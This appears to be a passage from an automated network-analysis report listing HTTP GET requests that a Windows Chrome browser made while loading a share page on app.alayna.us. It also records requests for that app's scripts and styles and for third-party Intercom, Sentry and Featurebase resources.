              Source: global trafficHTTP traffic detected: GET /client/workbox-296e213d.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /widget/qer2dd6p HTTP/1.1Host: widget.intercom.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.alayna.us/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/Layout.CYQvu7YC.css HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/ExclamationTriangleIcon.BNGKdN9E.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/ShareResourceScene.DMUPBnxd.css HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/ShareResourceScene.BY3t8mu1.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Layout.CsRrMVM6.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/decode.I0H7hHej.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/index.DUmOG7j4.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /share/r/RM0eszjvKf HTTP/1.1Host: app.alayna.usConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0If-None-Match: W/"196c-mGPgqXikBvn1vzRRgWbbBEt9pz8"
              Source: global trafficHTTP traffic detected: GET /client/assets/index.CtWPaFVW.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/ShareResourceScene.BY3t8mu1.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/YouTube.DOFcxXms.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Transition.1nOyKJ9c.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/ActivateUser.CFVvUFSP.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/index.DUmOG7j4.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /widget/qer2dd6p HTTP/1.1Host: widget.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /index.tsx HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518403.0.0.0If-None-Match: W/"196c-mGPgqXikBvn1vzRRgWbbBEt9pz8"
              Source: global trafficHTTP traffic detected: GET /client/assets/index.CtWPaFVW.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Layout.CsRrMVM6.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/decode.I0H7hHej.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/YouTube.DOFcxXms.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Transition.1nOyKJ9c.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Offline.Chq9LeuO.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /api/4505968358326272/envelope/?sentry_version=7&sentry_key=7891508b33b6a44378926ce96ad52c44&sentry_client=sentry.javascript.react%2F8.55.0 HTTP/1.1Host: o4505928814231552.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /index.tsx HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0If-None-Match: W/"196c-mGPgqXikBvn1vzRRgWbbBEt9pz8"
              Source: global trafficHTTP traffic detected: GET /client/assets/ActivateUser.sXFMIOsx.css HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/YouTube.DOFcxXms.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Transition.1nOyKJ9c.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/decode.I0H7hHej.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /js/sdk.js HTTP/1.1Host: do.featurebase.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/Offline.Chq9LeuO.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/imgs/pwa-192x192.png HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /frame.cab515ec.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /vendor.2947c1f5.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/ActiveTool.BqIvIPyM.css HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/imgs/pwa-192x192.png HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Layout.CsRrMVM6.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/ActiveTool.DehqpDq-.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /imgs/logos/logo-no-text.png HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /frame.cab515ec.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /vendor.2947c1f5.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
